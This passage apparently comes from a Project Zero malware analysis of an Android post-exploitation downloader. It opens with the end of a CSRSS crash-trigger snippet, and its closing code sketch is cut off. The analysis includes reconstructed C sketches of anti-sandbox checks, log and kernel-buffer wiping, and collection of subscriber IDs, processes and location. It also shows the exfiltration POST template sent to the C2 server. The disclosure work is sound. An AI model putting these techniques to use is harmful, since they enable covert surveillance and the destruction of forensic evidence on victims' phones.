
  CaptureUnicodeString(CaptureBuffer, Message + 0x48, NULL_BYTE_STR, 2);
  CaptureUnicodeString(CaptureBuffer, Message + 0x60, MANIFEST_NAME);
  CaptureUnicodeString(CaptureBuffer, Message + 0xc8, PATH);
  CaptureUnicodeString(CaptureBuffer, Message + 0x120, MODULE);

  // Triggers the issue by setting ApplicationName.MaxLength to a large value.
  *(uint16_t*)(Message + 0x122) = 0x8000;

  CsrClientCallServer(Message, CaptureBuffer, 0x10017, 0xf0);
}

This is part 6 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.

In-the-Wild Series: Android Post-Exploitation

By: Ryan
12 January 2021 at 17:37

This is part 5 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.

Posted by Maddie Stone, Project Zero

A deep-dive into the implant used by a high-tier attacker against Android devices in 2020

Introduction

This post covers what happens once the Android device has been successfully rooted by one of the exploits described in the previous post. What’s especially notable is that while the exploit chain only used known, and some quite old, n-day exploits, the subsequent code is extremely well-engineered and thorough. This leads us to believe that the choice to use n-days is likely not due to a lack of technical expertise.

This post describes what happens post-exploitation. Throughout, I will refer to the different portions of the exploit chain as “stage X”. These stage numbers refer to:

  • Stage 1: Chrome renderer exploit
  • Stage 2: Android privilege escalation exploit
  • Stage 3: Post-exploitation downloader ← *described in this post!*
  • Stage 4: Implant

This post details stage 3, the code that runs post exploitation. Stage 3 is an ARM ELF file that expects to run as root. This stage 3 ELF is embedded in the stage 2 binary in the data section. Stage 3 is a downloader for stage 4.

As stated at the beginning, this stage, stage 3, is a very well-engineered piece of software. It is very thorough in its methods to hide its behavior and to ensure that it is running on the correct targeted device. Stage 3 includes obfuscation, many anti-analysis checks, detailed logging, command and control (C2) server communications, and ultimately, the downloading and executing of Stage 4. Based on the size and modularity of the code, it seems likely that it was developed by a team rather than a single individual.

So let’s get into the fun!

Execution

Once stage 2 has successfully rooted the device and modified different security settings, it loads stage 3. Stage 3 is embedded in the data section of stage 2 and is 0x436C bytes in size. Stage 2 includes a variety of different methods to load the stage 3 ELF including writing it to /proc/self/mem. Once one of these methods is successful, execution transfers to stage 3.

This stage 3 ELF exports two functions: init and d. init is the function called by stage 2 to begin execution of stage 3. However, the main functionality for this binary is not in this function. Instead it is in two functions that are referenced by the ELF’s .init_array. The first function ensures that the environment variables PATH, ANDROID_DATA, and ANDROID_ROOT are set to expected values. The second function spawns a new thread that runs the heavy lifting of the behavior of the binary. The init function simply calls pthread_join on the thread spawned by the second function in the .init_array so it will wait for that thread to terminate.
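As an illustration, the pattern described above can be sketched in a few lines of C. This is a minimal reconstruction under our own naming, not the binary's actual code:

#include <pthread.h>

static pthread_t g_worker;

static void *worker_main(void *arg) {
  /* main control loop: decrypt the config, run anti-analysis checks,
     contact the C2 server */
  (void)arg;
  return NULL;
}

/* emitted into .init_array, so it runs when the ELF is loaded; the real
   binary also fixes up PATH, ANDROID_DATA and ANDROID_ROOT in a sibling
   .init_array function */
__attribute__((constructor)) static void spawn_worker(void) {
  pthread_create(&g_worker, NULL, worker_main, NULL);
}

/* the exported entry point called by stage 2 */
void init(void) {
  pthread_join(g_worker, NULL);
}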

In the newly spawned thread, first, it cleans up from the previous stage by deleting most of the environment variables that stage 2 set. Then it will kill any processes that include the word “knox” in the cmdline. Knox is a security platform that is built into Samsung devices. 

Next, the code will check how often this binary has been running by reading a file that it drops on the device called state.parcel. The execution proceeds normally as long as it hasn’t been run more than 6 times on the current day. In other cases, execution changes as described in the state.parcel file section. 

The binary will then iterate through the process’s open file descriptors 0-2 (usually stdin, stdout, and stderr) and point them at /dev/null. This prevents output messages from appearing which might lead a user or others to detect the presence of the exploit chain. The code will then iterate through any other open file descriptors (/proc/self/fd/) for the process and close any that include “pipe:” or “anon_inode:” in their symlinks. It will also close any file descriptors with a number greater than 32 that include “socket:” in the link and any that don’t include /data/dalvik-cache/arm or /dev/ in the name. This may be to prevent debugging or to reduce accidental damage to the rest of the system.

The thread will then call into the function that includes significant functionality for the main behavior of the binary. It decrypts data, sets up configuration data, performs anti-analysis and debugging checks, and finally contacts the C2 server to download the next stage and executes it. This can be considered the main control loop for Stage 3.

The rest of this post explains the technical details of the Stage 3 binary’s behavior, grouped by category.

Obfuscation

Stage 3 uses quite a few different layers of obfuscation to hide the behavior of the code. It uses a string obfuscation technique similar to stage 2’s. It also uses a hash table to store dynamic configuration settings and status; instead of a descriptive string, each “key” passed to the hashing function is a series of 16 AES-decrypted bytes. The binary encrypts its static configuration settings, its communications with the C2, and the hash table that stores dynamic configuration settings with AES, while the state.parcel file that is saved on the device is XOR encoded. The binary also includes multiple techniques to make it harder to understand its behavior using dynamic analysis. For example, it monitors what is mapped into the process’s memory and what file descriptors it has opened, and it sends very detailed information to the C2 server.

Similar to the previous stages, Stage 3 seems to be well engineered with a variety of different techniques to make it more difficult for an analyst to determine its behavior, either statically or dynamically. The rest of this section will detail some of the different techniques.

String Obfuscation

The vast majority of the strings within the binary are obfuscated. The obfuscation method is very similar to that used in previous stages. The obfuscated string is passed to a deobfuscation function prior to use. The obfuscated strings are designated by 0x7E7E7E (“~~~”) at the end of the string. To deobfuscate these strings, we used an IDAPython script using flare_emu that emulated the behavior of the deobfuscation function on each string.

Configuration Settings Decryption

A data block within the binary, containing important configuration settings, is encrypted using AES256. It is decrypted upon entrance to the main control function. The decrypted contents are written back to the same location in memory where the encrypted contents were. The code uses OpenSSL to perform the AES256 decryption. The key and the IV are hardcoded into the binary.

Whenever this blog post refers to the “decrypted data block”, we mean this block of memory. The decrypted data includes things such as the C2 server url, the user-agent to use when contacting the C2 server, version information and more. Prior to returning from the main control function, the code will overwrite the decrypted data block to all zeros. This makes it more difficult for an analyst to dump the decrypted memory.

Once the decryption is completed, the code double checks that decryption was successful by looking at certain bytes and verifying their values. If any of these checks fail, the binary will not proceed with contacting the C2 server and downloading stage 4.
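A minimal sketch of that decryption step, assuming AES-256-CBC with PKCS#7 padding via OpenSSL’s EVP interface (the post only establishes AES256 with a hardcoded key and IV; the mode and padding here are our assumptions):

#include <openssl/evp.h>

/* key and iv stand in for the values hardcoded in the binary */
int decrypt_block(const unsigned char *enc, int enc_len,
                  const unsigned char *key, const unsigned char *iv,
                  unsigned char *out) {
  EVP_CIPHER_CTX *ctx = EVP_CIPHER_CTX_new();
  int len = 0, total = 0;
  if (!ctx)
    return -1;
  if (EVP_DecryptInit_ex(ctx, EVP_aes_256_cbc(), NULL, key, iv) != 1 ||
      EVP_DecryptUpdate(ctx, out, &len, enc, enc_len) != 1) {
    EVP_CIPHER_CTX_free(ctx);
    return -1;
  }
  total = len;
  if (EVP_DecryptFinal_ex(ctx, out + total, &len) != 1) {
    EVP_CIPHER_CTX_free(ctx);
    return -1;
  }
  EVP_CIPHER_CTX_free(ctx);
  return total + len;
}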

Hashtable Encryption

Another block of data that is 0x140 bytes long is then decrypted in the same way. This decrypted data doesn’t include any human-readable strings, but is instead used as “keys” for a hash table that stores configuration settings and status information. We’ll call this area the “decrypted keys block”. The information that is stored in the hash table can change whereas the configuration settings in the decrypted data block above are expected to stay the same throughout execution. The decrypted keys block, which serves as the hash table keys, is shown below.

00000000: 9669 d307 1994 4529 7b07 183e 1e0c 6225  .i....E){..>..b%
00000010: 335f 0f6e 3e41 1eca 1537 3552 188f 932d  3_.n>A...75R...-
00000020: 4bf4 79a4 c5fd 0408 49f4 b412 3fa3 ad23  K.y.....I...?..#
00000030: 837b 5af1 2862 15d9 be29 fd62 605c 6aca  .{Z.(b...).b`\j.
00000040: ad5a dd9c 4548 ca3a 7683 5753 7fb9 970a  .Z..EH.:v.WS....
00000050: fe71 a43d 78b1 72f5 c8d4 b8a4 0c9e 925c  .q.=x.r........\
00000060: d068 f985 2446 136c 5cb0 d155 ad8d 448e  .h..$F.l\..U..D.
00000070: 9307 54ba fc2d 8b72 ba4d 63b8 3109 67c9  ..T..-.r.Mc.1.g.
00000080: e001 77e2 99e8 add2 2f45 1504 557f 9177  ..w...../E..U..w
00000090: 9950 9f98 91e6 551b 6557 9c62 fea8 afef  .P....U.eW.b....
000000a0: 18b8 8043 9071 0f10 38aa e881 9e84 e541  ...C.q..8......A
000000b0: 3fa0 4697 187f fb47 bbe4 6a76 fa4b 5875  ?.F....G..jv.KXu
000000c0: 04d1 2861 6318 69bd 7459 b48c b541 3323  ..(ac.i.tY...A3#
000000d0: 16cd c514 5c7f db99 96d9 5982 f6f1 88ee  ....\.....Y.....
000000e0: f830 fb10 8192 2fea a308 9998 2e0c b798  .0..../.........
000000f0: 367f 7dde 0c95 8c38 8cf3 4dcd acc4 3cd3  6.}....8..M...<.
00000100: 4473 9877 10c8 68e0 1673 b0ad d9cd 085d  Ds.w..h..s.....]
00000110: ab1c ad6f 049d d2d4 65d0 1905 c640 9f61  ...o....e....@.a
00000120: 1357 eb9a 3238 74bf ea2d 97e4 a747 d7b6  .W..28t..-...G..
00000130: fd6d 8493 2429 899d c05d 5b94 0096 4593  .m..$)...][...E.

The binary uses this hash table to keep track of important values such as status and configuration. The code initializes a CRC table, which is used in the hashing algorithm, and then initializes the hash table. The structure that manages the hashtable is shown below:

struct hashtable_mgr {
    int * hashtable_ptr;
    int maxEntries;
    int numEntries;
};

The first member of this struct points to the hash table which is allocated on the heap and has size 0x1400 bytes when it’s first initialized. The hash table uses sets of 0x10 bytes from the decrypted keys block as the key that gets passed to the hashing function.

There are two main functions that are used to interact with this hashtable throughout the binary: we’ll call them getValueFromHashtable and putValueInHashtable. Both functions take four arguments: pointer to the hashtable manager, pointer to the key (usually represented as an offset from the beginning of the decrypted keys block), a pointer for the value, and an int for the value length. Through the rest of this post, I will refer to values that are stored in the hash table. Because the key is a series of 0x10 bytes, I will refer to values as “the value for offset 0x20 in the hash table”. This means the value that is stored in the hashtable for the “key” that is 0x10 bytes and begins at the address of the start of the decrypted keys block + 0x20.
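Based on that description, the two accessors plausibly look like the following; the prototypes and the example caller are our reconstruction, not recovered symbols:

int getValueFromHashtable(struct hashtable_mgr *mgr, const unsigned char *key,
                          void *value, unsigned int value_len);
int putValueInHashtable(struct hashtable_mgr *mgr, const unsigned char *key,
                        void *value, unsigned int value_len);

/* reading "the value for offset 0x20 in the hash table" */
unsigned int read_value_0x20(struct hashtable_mgr *mgr,
                             const unsigned char *decrypted_keys_block) {
  unsigned int value = 0;
  getValueFromHashtable(mgr, decrypted_keys_block + 0x20, &value,
                        sizeof(value));
  return value;
}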

Each entry in the hashtable has the following structure.

struct hashtable_entry {
    BYTE * key_ptr;
    uint key_len;
    uint in_use;
    BYTE * value_ptr;
    uint value_len;
};

I have documented the majority of the entries in the hashtable here. I use the key’s offset from the beginning of the decrypted keys block as the “key” instead of typing out the series of 0x10 bytes. As shown in the linked sheet, the hashtable contains the dynamic variables that stage 3 needs to keep track of. For example, the filename where to save stage 4 and the install and failure counts.

The hashtable is periodically written to a file named uierrors.txt as described in the Persistence section. This is to save state in case the process exits.

Persistence

The whole exploit chain diligently cleans up after itself to leave as few indicators as possible of its presence. However, stage 3 does save a couple of files and adds environment variables in order to function. This is in addition to the stage 4 code which will be discussed in the “Executing the Next Stage” section. Each of the files and variables described in this section will be deleted as soon as they’re no longer needed, but they will be on a device for at least a period of time. For each of the files that are saved to the device, the directory path is often randomly selected from a set of potential paths. This makes it more time consuming for an analyst to detect the presence of the file on a device because the analyst would have to check 5 different paths for each file rather than 1.

state.parcel File

During startup, the code will record the current time in a file named state.parcel. After it records the current time at the beginning of the file, it will then check how many times per day this has been done by reading all of the times currently in the file. If there are less than 6 entries for the current day, the code proceeds. If there are 6 entries in the file from the current day and there are at least 5 entries for each of the previous 3 days, the binary will set a variable that will tell the code to clean up and exit. If there are 6 entries for the current day and there’s at least one entry for each of the past 3 days, the binary will clean up the persistent files for both this and other stages and then do a max sleep: sleep(0xFFFFFFFF), which is the equivalent of sleeping for over 136 years.

If the effective UID is 0 (root), then the code will randomly choose one of the following paths to write the file to:

  • /data/backup/
  • /data/data/
  • /data/
  • /data/local/
  • /data/local/tmp/

If the effective UID is not 0, then the state.parcel file will be written to whatever directory the binary is executing out of according to /proc/self/exe. The contents in state.parcel are obfuscated by XOR’ing each entry with 0xFF12EE34.
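A tiny sketch of that encoding; we assume each entry is written as a 32-bit value (the post only gives the XOR constant):

#include <stdint.h>

#define STATE_PARCEL_KEY 0xFF12EE34u

/* XOR is symmetric, so the same routine encodes an entry before writing
   and decodes it after reading */
uint32_t state_parcel_xor(uint32_t entry) {
  return entry ^ STATE_PARCEL_KEY;
}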

uierrors.txt - Hash table contents

Stage 3 periodically writes the hash table that contains configuration and status information to a file named uierrors.txt. The code uses the same process as for state.parcel to decide which directory to write the file to.

Whenever the hashtable is written to uierrors.txt it is encrypted using AES256. The key is the same AES key used to decrypt the configuration settings data block, but it generates a set of 0x10 random bytes to use as the IV. The IV is written to the uierrors.txt file first and then is followed by the encrypted hash table contents. The CRC32 of the encrypted contents of the file is written to the file as the last 4 bytes.
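The resulting on-disk layout can be sketched as follows; the AES encryption itself is omitted, and the writer below only illustrates the IV-prefix and CRC32-suffix framing described above:

#include <stdint.h>
#include <stdio.h>
#include <zlib.h> /* crc32() */

/* layout: [0x10-byte random IV][AES-256-encrypted hashtable contents]
   [CRC32 of the encrypted bytes as the last 4 bytes] */
int write_uierrors(FILE *f, const unsigned char iv[16],
                   const unsigned char *enc, unsigned int enc_len) {
  uint32_t crc = (uint32_t)crc32(0L, enc, enc_len);
  if (fwrite(iv, 1, 16, f) != 16) return -1;
  if (fwrite(enc, 1, enc_len, f) != enc_len) return -1;
  if (fwrite(&crc, sizeof(crc), 1, f) != 1) return -1;
  return 0;
}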

Environment Variables

On start-up, stage 3 will remove the majority of the environment variables set by the previous stage. It then sets its own new environment variables.

Environment Variable Name: Value

  • abc: Address of the decrypted data block
  • def: Address of the function that will send logging messages to the C2 server
  • def2: Address of the function that adds logging messages to the error and/or informational logging message queues
  • ghi: Points to the decrypted block of hashtable keys
  • ddd: Address of the function that performs inflate (decompress)
  • ccc: Address of the function that performs deflate (compress)
  • 0x10 bytes at 0x228CC: ???
  • 0x10 bytes at 0x228DC: Pointer to the string representation of the hex_d_uuid
  • 0x10 bytes at 0x228F0: Pointer to the C2 domain URL
  • 0x10 bytes at 0x22904: Pointer to the port string for the C2 server
  • 0x10 bytes at 0x22918: Pointer to the beginning of the certificate
  • 0x10 bytes at 0x2292C: 0x1000
  • 0x10 bytes at 0x22940: Pointer to +4AA in the decrypted data block
  • 0x10 bytes at 0x22954: 0x14
  • 0x10 bytes at 0x22698: Pointer to the user-agent string
  • PPR: Selinux status such as “selinux-init-read-fail” or “selinux-no-mdm”
  • PPMM: Set if there is no “persist.security.mdm.policy” string in /init
  • PPQQ: Set if the “persist.security.mdm.policy” string is in /init

Error Handling & Logging

The binary has a very detailed and mature logging mechanism. It tracks both “error” and “informational” logging messages. These messages are saved until they’re sent to the C2 server either when stage 3 is automatically reaching out to the C2 server, or “on-demand” by calling the subroutine that is saved as environment variable “def”. The subroutine saved as environment variable “def2”, adds messages to the error and/or informational message queues. There are hundreds of different logging messages throughout the binary. I have documented the meaning of some of the different logging codes here.

Clean-Up

This code is very diligent about cleaning up its tracks, both while it’s running and once it finishes. While it’s running, the binary forks a new process which is responsible for cleaning up logs while the other code is executing (a sketch follows the list below). This other process does the following to clean up stage 3’s tracks:

  • Connect to the socket /dev/socket/logd and clear all logs
  • Execute klogctl(5,0,0), which is SYSLOG_ACTION_CLEAR and clears the kernel ring buffer
  • Unlink all of the files in the following directories:
      • /data/tombstones
      • /data/misc/audit
      • /data/system/dropbox
      • /data/anr
      • /data/log
  • Unlink the file /cache/recovery/last_avc_msg_recovery
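A hedged C sketch of that cleanup routine; the logd command string is our assumption (the post only says the socket is used to clear all logs):

#include <string.h>
#include <sys/klog.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <unistd.h>

static void clear_logs(void) {
  /* clear the userspace logs via logd's control socket; the exact
     command format here is hypothetical */
  int fd = socket(AF_UNIX, SOCK_STREAM, 0);
  if (fd >= 0) {
    struct sockaddr_un addr = { .sun_family = AF_UNIX };
    strncpy(addr.sun_path, "/dev/socket/logd", sizeof(addr.sun_path) - 1);
    if (connect(fd, (struct sockaddr *)&addr, sizeof(addr)) == 0)
      write(fd, "clear 0", 7);
    close(fd);
  }
  /* SYSLOG_ACTION_CLEAR (5): clear the kernel ring buffer */
  klogctl(5, NULL, 0);
  /* unlink the files under /data/tombstones, /data/misc/audit,
     /data/system/dropbox, /data/anr and /data/log (loop omitted) */
  unlink("/cache/recovery/last_avc_msg_recovery");
}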

There are also a couple of different functions that clean up all potential dropped files from both this stage and other stages and remove the set environment variables.

Communications with C2 Server

The whole point of this binary is to download the next stage from the command and control (C2) server. Once the previous unpacking steps and checks are completed, the binary will begin preparing the network communications. First the binary will perform a DNS test, then gather device information, and send the POST request to the C2 server. If all these steps are successful, it will receive back the next stage and prepare to execute that.

DNS Test

Prior to reaching out to the C2 server, the binary performs a DNS test. It takes a pointer to the decrypted data block as its argument. First the function generates a random hostname that is between 8-16 lowercase latin characters. It then calls getaddrinfo on this random hostname. It’s trying to find a host that will cause getaddrinfo to return EAI_NODATA, meaning that no address information could be found for that host. It will attempt 3 different addresses before it will bail if none of them return EAI_NODATA. Some disconnected analysis sandboxes will respond to all hostnames and so the code is trying to detect this type of malware analysis environment.
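A sketch of that check, following the behavior described above (8-16 character hostnames, three attempts, EAI_NODATA as the expected result):

#define _GNU_SOURCE /* for EAI_NODATA on glibc; always defined on bionic */
#include <netdb.h>
#include <stdlib.h>

static int dns_sanity_check(void) {
  for (int attempt = 0; attempt < 3; attempt++) {
    char host[17];
    int len = 8 + rand() % 9; /* 8-16 lowercase latin characters */
    for (int i = 0; i < len; i++)
      host[i] = 'a' + rand() % 26;
    host[len] = '\0';

    struct addrinfo *res = NULL;
    int rc = getaddrinfo(host, NULL, NULL, &res);
    if (res)
      freeaddrinfo(res);
    if (rc == EAI_NODATA)
      return 0;  /* the resolver behaves normally */
  }
  return -1;     /* every name resolved: likely an analysis sandbox */
}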

Once it finds a hostname that returns EAI_NODATA, stage 3 does a DNS query with that hostname. The DNS server address is found in the decrypted block in argument 1 at offset 0x14C7. In this binary that is 8.8.8.8:53, the Google DNS server. The code will connect to the DNS server via a socket and then send a Type A query for the randomly generated host name and parse the response. The only acceptable response from the server is NXDomain, meaning “Non-Existent Domain”.  If the code receives back NXDomain from the DNS server, it will proceed with the code path that communicates with the C2 Server.

Handshake with the C2 Server

The C2 server hostname and port is read from the decrypted data block. The port number is at offset 0x84 and the hostname is at offset 0x4.

The binary first connects via a socket to the C2 server, then connects with SSL/TLS. The SSL/TLS certificate, a root certificate, is also in the decrypted data block at offset 0x4C7. The binary uses the OpenSSL library.
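A minimal OpenSSL sketch of that connection, assuming a modern TLS_client_method(); loading the embedded root certificate into the verify store is omitted:

#include <openssl/ssl.h>

/* sock_fd is a TCP socket already connected to the C2 host and port
   read from the decrypted data block */
SSL *connect_c2(int sock_fd) {
  SSL_CTX *ctx = SSL_CTX_new(TLS_client_method());
  if (!ctx)
    return NULL;
  SSL *ssl = SSL_new(ctx);
  if (!ssl) {
    SSL_CTX_free(ctx);
    return NULL;
  }
  SSL_set_fd(ssl, sock_fd);
  if (SSL_connect(ssl) != 1) {
    SSL_free(ssl);
    SSL_CTX_free(ctx);
    return NULL;
  }
  return ssl; /* the subsequent POST goes through SSL_write/SSL_read */
}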

Collecting the Data to Send

Once it successfully connects to the C2 server via SSL/TLS, the binary will begin collecting all the device information that it wants to send to the C2 server, and it collects a very large amount of data. Six different sets of information are collected, formatted, compressed, and encrypted prior to sending to the remote server. The different “sets” of data that are collected are:

  • Device characteristics
  • Application information
  • Phone location information
  • Implant status
  • Running processes
  • Logging  (error & informational) messages

Device Characteristics

For this set, the binary is collecting device characteristics such as the Android version, the serial number, model, battery temperature, st_mode of /dev/mem and /dev/kmem, the contents of /proc/net/arp and /proc/net/route, and more. The full list of device characteristics that are collected and sent to the server are documented here.

The binary uses a few different methods for collecting this data. The most common is to read system properties, and it has two different ways to do that (sketched after this list):

  • Call __system_property_get by doing dlopen(/system/lib/libc.so) and dlsym('__system_property_get').
  • Executing getprop in popen
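Both methods can be sketched as follows; the property name passed in a real call would be whatever the implant queries:

#include <dlfcn.h>
#include <stdio.h>

#define PROP_VALUE_MAX 92 /* bionic's limit for property values */

typedef int (*sys_prop_get_t)(const char *name, char *value);

/* method 1: dlopen(/system/lib/libc.so) + dlsym('__system_property_get') */
int get_prop_dlsym(const char *name, char value[PROP_VALUE_MAX]) {
  void *libc = dlopen("/system/lib/libc.so", RTLD_NOW);
  if (!libc)
    return -1;
  sys_prop_get_t prop_get =
      (sys_prop_get_t)dlsym(libc, "__system_property_get");
  return prop_get ? prop_get(name, value) : -1;
}

/* method 2: executing getprop in popen */
int get_prop_popen(const char *name, char *value, int len) {
  char cmd[128];
  snprintf(cmd, sizeof(cmd), "getprop %s", name);
  FILE *p = popen(cmd, "r");
  if (!p)
    return -1;
  if (!fgets(value, len, p))
    value[0] = '\0';
  return pclose(p);
}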

To get the device ID, subscriber ID, and MSISDN, the binary uses the service call shell command. To call a function from a service using this API, you need to know the code for the function. Basically, the code is the position at which the function is listed in the AIDL file, which means it can change with each new Android release. The developers of this binary hardcoded the service code for each Android SDK version from 8 (Froyo) through 29 (Android 10). For example, the getSubscriberId code in the iphonesubinfo service is 3 for Android SDK versions 8-20, 5 for SDK version 21, and 7 for SDK versions 22-29 (see the sketch below).
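That per-SDK table reduces to a small helper; the codes below are the getSubscriberId values quoted above, and the command construction is our reconstruction:

#include <stdio.h>
#include <stdlib.h>

/* transaction code for getSubscriberId in the iphonesubinfo service,
   per the SDK ranges given above */
int get_subscriber_id_code(int sdk) {
  if (sdk >= 8 && sdk <= 20) return 3;
  if (sdk == 21) return 5;
  if (sdk >= 22 && sdk <= 29) return 7;
  return -1; /* unsupported SDK */
}

void dump_subscriber_id(int sdk) {
  int code = get_subscriber_id_code(sdk);
  if (code < 0)
    return;
  char cmd[64];
  snprintf(cmd, sizeof(cmd), "service call iphonesubinfo %d", code);
  system(cmd); /* parsing the binder reply it prints is omitted */
}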

The code also collects detailed networking information. For example, it collects the MAC address and IP address for each interface listed under the /sys/class/net/ directory.

Application Information

To collect information about the applications installed on the device, the binary will send all of the contents of /data/system/packages.xml to the C2 server. This XML file includes data about both the user-installed and the system-installed packages on the device.

Phone Location Information

To gather information about the physical location of the device, the binary runs dumpsys location in a shell. It sends the full output of this data back to the C2 server. The output of the dumpsys location command includes data such as the last known GPS locations.

Implant Status

The binary collects information about the status of the exploits and subsequent stages (including this one) to send back to the C2 server. Most of these values are obtained from the hash storage table. There are 22 value pairs that are sent back to the server. These values include things such as the installation time and the “repair count”, the build id, and the major and minor version numbers for the binary. The full set of data that is sent to the C2 server is available here.

Running Processes

The binary sends information about every single running process back to the C2 server. It will iterate through each directory under /proc/ and send back the following information for each process (a sketch follows the list):

  • Name
  • Process ID (PID)
  • Parent’s PID
  • Groups that the process belongs to
  • Uid
  • Gid
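One plausible way to gather those fields is to read each PID's status file; the binary's exact parsing is not shown in the post:

#include <ctype.h>
#include <dirent.h>
#include <stdio.h>

/* walk /proc; each process's status file carries the Name, PPid,
   Uid, Gid and Groups lines listed above */
void enumerate_processes(void) {
  DIR *proc = opendir("/proc");
  if (!proc)
    return;
  struct dirent *ent;
  while ((ent = readdir(proc)) != NULL) {
    if (!isdigit((unsigned char)ent->d_name[0]))
      continue; /* only numeric entries are PIDs */
    char path[64], line[256];
    snprintf(path, sizeof(path), "/proc/%s/status", ent->d_name);
    FILE *f = fopen(path, "r");
    if (!f)
      continue;
    while (fgets(line, sizeof(line), f))
      printf("%s: %s", ent->d_name, line);
    fclose(f);
  }
  closedir(proc);
}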

Logging Information

As described in the Error Handling & Logging section, whenever the binary encounters an error, it creates an error message. The binary will send a maximum of 0x1F of these error messages back to the C2 server. It will also send a maximum of 0x1F “informational” messages back to the server. “Info” messages are similar to the error messages except that they document a condition that is less severe than an error; this is a distinction the developers built into their code.

Constructing the Request

Once all of the “sets” of information are collected, they are compressed using the deflate function. The compressed “messages” each have the following compressedMessage structure. The messageCode is a type of identification code for the information that is contained in the message. It is computed by taking the crc32 of the 0x10 bytes at offset 0x1CD8 in the decrypted data block and adding the “identification code”.

struct compressedMessage {
    uint compressedDataLength;
    uint uncompressedDataLength;
    uint messageCode;
    BYTE * dataPointer;
    BYTE data[4096];
};

Once each of the messages, or sets of data, have been individually compressed into the compressedMessage struct, the byte order is swapped to change the endianness and then the data is all encrypted using AES256. The key from the decrypted data block is used and the IV is a set of 0x10 random bytes. The IV is prepended to the beginning of the encrypted message.
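A sketch of how one such message might be assembled, restating the structure with portable types and using zlib's compress2 (which wraps deflate) as a stand-in; base_crc and id_code are the two components of the message code described above:

#include <zlib.h>

struct compressed_message {
  unsigned int compressedDataLength;
  unsigned int uncompressedDataLength;
  unsigned int messageCode;
  unsigned char *dataPointer;
  unsigned char data[4096];
};

/* base_crc stands in for crc32 over the 0x10 bytes at offset 0x1CD8 of
   the decrypted data block; id_code is the per-set identification code */
int build_message(struct compressed_message *msg, const unsigned char *src,
                  unsigned long src_len, unsigned int base_crc,
                  unsigned int id_code) {
  unsigned long dst_len = sizeof(msg->data);
  if (compress2(msg->data, &dst_len, src, src_len, Z_BEST_COMPRESSION) != Z_OK)
    return -1;
  msg->compressedDataLength = (unsigned int)dst_len;
  msg->uncompressedDataLength = (unsigned int)src_len;
  msg->messageCode = base_crc + id_code;
  msg->dataPointer = msg->data;
  return 0;
}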

The data is sent to the server as a POST request. The full header is shown below.

POST /api2/v9/pass HTTP/1.1
User-Agent: Mozilla/5.0 (Linux; Android 6.0.1; SM-G600FY Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.0 Chrome/38.0.2125.102 Mobile Safari/537.3
Host: REDACTED:443
Connection: keep-alive
Content-Type:application/octet-stream
Content-Length:%u
Cookie: %s

The “Cookie” field holds two values from the decrypted data block, sid and uid, whose values are base64 encoded.

The body of the POST request is all of the data collected and compressed in the section above. This request is then sent to the C2 server via the SSL/TLS connection.

Parsing the Response

The response received back from the server is parsed. If the HTTP Response Code is not 200, it’s considered an error. The received data is first decrypted using AES256. The key used is the key that is included in the decrypted data block at offset 0x48A and the IV is sent back as the first 0x10 bytes of the response. After being decrypted, the byte order is swapped using bswap32 and the data is then decompressed using inflate. This inflated response body is an executable file or a series of commands.

C2 Server Cookies

The binary will also store and delete cookies for the C2 server domain and the exploit server domain. First, the binary will delete the cookie for the hostname of the exploit server that is the following name/value pair: session=<XXX>. This name/value is hardcoded into the decrypted data block within the binary. Then it will re-add that same cookie, but with an updated last accessed time and expire time.

Executing the Next Stage

As stated previously, stage 3’s role in the exploit chain is to check that the binary is not being analyzed and if not, collect detailed device data and send it to the C2 server to receive back the next stage of code and commands that should be executed. The detailed information that is sent back to the C2 server is likely used for high-fidelity targeting.

The developers of stage 3 purposefully built in a variety of different ways that the next stage of code can be executed: a series of commands passed to system or a shared library ELF file which can be executed by calling dlopen and dlsym, and more. This section will detail the different ways that the C2 server can instruct stage 3 to save and begin executing the next stage of code.

If the POST request to the C2 server is successful, the code will receive back either an executable file or a set of commands which it’ll “process”.  The response is parsed differently based on the “message code” in the header of the response. This “message code” is similar to what was described in the “Constructing the Request” section. It’s an identification code + the CRC32 of the 0x10 bytes at 0x25E30. When processing the response, the binary calculates the CRC32 of these bytes again and subtracts them from the message code. This value is then used to determine how to treat the contents of the response. The majority of the message codes distinguish different ways for the response to be saved to the device and then be executed.

There are a few functions that are commonly used by multiple message codes, so they are described here first.

func1 - Writes the response contents to files in both the /data/dalvik-cache/arm and /mnt directories.

This function does the following:

  1. Writes the buffer of the response to /data/dalvik-cache/arm/<file name keyed by 0x10 in hashtable>
  2. Gets a filename from mkstemp(“/mnt/XXXXXX”)
  3. Write the buffer of the response to a file with the name from step #2 + “abc” concatenated to the end: /mnt/XXXXXXabc
  4. Write a specific value from memory to the file with the name from step #2 with “xyz” concatenated to the end: /mnt/XXXXXXxyz. This specific value can be changed through the 2nd function that is exported by the stage 3 binary: d.

func2 - Fork child process and inject code using ptrace.

This function forks a new process where the child will call the function init from an ELF library, then the parent will inject the code from the response into the child process using ptrace. The ELF library that is opened with dlopen and then init is called on is named /system/bin/%016lx%016lx with both values being the address of the buffer pointer.

func3 - Writes the buffer of the reply contents to file and sets the permissions and SELinux attributes.

This function will write the buffer to either the file path provided in the third argument, or it will generate a new file path. If it’s generating a new temporary file name, the code walks the following list of directory names beginning with /cache; in the first directory that it can stat, it will create the temporary file using mkstemp(“%s/XXXXXX”):

  • /cache
  • /mnt/secure/asec
  • /mnt/secure/staging
  • /mnt/secure
  • /mnt/obb
  • /mnt/asec
  • /mnt
  • /storage

After the new file is created, the code sets the permissions on the file path to those supplied to the function as the fourth argument. Then it will set the SELinux attributes of the file to those passed in in the fifth argument.
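A sketch of that flow; the argument order mirrors the description above, and applying the SELinux label via setxattr on security.selinux is our assumption about the mechanism:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/xattr.h>
#include <unistd.h>

/* pick the first directory that stat() succeeds on, create a temp file
   there, then apply the requested permissions and SELinux label */
int drop_file(const void *buf, size_t len, mode_t mode, const char *selabel) {
  static const char *dirs[] = {
      "/cache", "/mnt/secure/asec", "/mnt/secure/staging", "/mnt/secure",
      "/mnt/obb", "/mnt/asec", "/mnt", "/storage",
  };
  char path[64];
  struct stat st;
  for (size_t i = 0; i < sizeof(dirs) / sizeof(dirs[0]); i++) {
    if (stat(dirs[i], &st) != 0)
      continue;
    snprintf(path, sizeof(path), "%s/XXXXXX", dirs[i]);
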